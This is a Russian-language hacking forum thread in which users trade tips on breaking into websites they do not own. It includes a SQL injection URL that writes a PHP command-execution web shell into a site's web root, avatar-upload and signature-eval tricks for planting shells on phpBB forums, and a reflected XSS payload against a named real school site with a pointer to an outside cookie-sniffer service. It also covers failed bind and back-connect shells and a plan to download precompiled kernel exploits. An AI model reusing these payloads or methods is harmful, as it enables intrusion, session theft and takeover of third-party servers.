сори за глупый вопрос, но вот пытаюсь залить шелл вот так:
detalle.php?id=-1+union+select+0x3C3F73797374656D28245F4745545B222 0636D64225D293B3F3E,2,3,4,5,6+into+outfile+'/home/site/html/shell.php'--

3C3F73797374656D28245F4745545B2220636D64225D293B3F 3E -- это я захексил <?system($_GET[cmd]);?>

проблема в том что кавычки в этом месте слешируются '/home/site/html/shell.php' что можно сделать?

Если maqic_quotes включен, то никак. Есть один вариант, через двойные запросы, вроде бы Scipio писал.
Но сомневаюсь, что ты понимаешь что это такое и как это реализовать, потому что вопрос действитеьно глупый.

Там фреймы

не канает метод шанкара... остальные тожe,
когда аватарку загружаю выдает вот это

Unable to upload file

DEBUG MODE

Line : 251
File : usercp_avatar.php

Что посоветуете?

а какие остальные? В подпись eval пробовал совать? Есть вопросы - PM

PS: решено)

помогите! на сайте http://school145.edu.kh.ua/ есть пассивная xss как стырить куки?

http://school145.edu.kh.ua/livesearch/search/query/?value="><script>alert()</script>
вместо "><script>alert()</script> скрипт сниффера(например sniffer.xaknet.ru)

Ну что же друзья, может это будет и оффтоп , но решилась не одна проблема по заливке шелла на форум пхпбб, много форумов у которых не срабатывал ни один общеизветсный способ заливки кода ,сегодня стали достоянием моего списка с шеллами. И все благодаря способу который Pashkela описал тут link .Всем рекомендую.

вообщем такая проблемка,есть linux (debian) 2.6.18. залил шелл wso2,биндпорт,бэкконнект
не проходит... при вводе which gcc ничего не показует, хотя на вкладке шелла [sec. info] явно показует (gcc version 4.1.2 20061115 (prerelease)... как быть дальше? может попробовать скомпилированый сплоит под это ядро? вот только где взять компилированый? wget присутствует...
P.S. Я так понимаю что если выход в инет осуществляется через VPN сервер то бэкконект и биндпорт непроканает?...